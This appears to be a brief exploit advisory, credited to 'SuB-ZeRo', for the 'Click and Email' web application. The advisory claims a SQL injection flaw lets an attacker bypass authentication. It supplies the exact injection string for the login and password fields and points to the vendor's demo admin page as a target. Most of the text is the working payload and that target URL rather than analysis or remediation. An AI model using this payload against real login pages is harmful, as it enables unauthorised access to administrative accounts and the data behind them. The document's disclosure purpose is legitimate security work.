Click and Email suffers from a remote SQL injection vulnerability that allows for authentication bypass.
8d44c82de81eb663990eabc9e7d2d4f1d94df88fbc0ed98f6d2b01f986d677ef
* Founded By : SuB-ZeRo (WaLiD)
* E-mail : Fbh@hotmail.com
* Home : WwW.dz-security.Net
* GreeTZ : Evils-dz & X.CJP.x & www.dz-security.net & gaza
---------------------------------------------------------
vondor : http://icash.ch
---------------------------------------------------------
Exploit Auth Bypass:
login: ' or ' 1=1
passw: ' or ' 1=1
----------------------------------------------------------
-[!]
Demo :
http://icash.ch/ClickAndEmailDemo/admin.asp
----------------------------------------------------------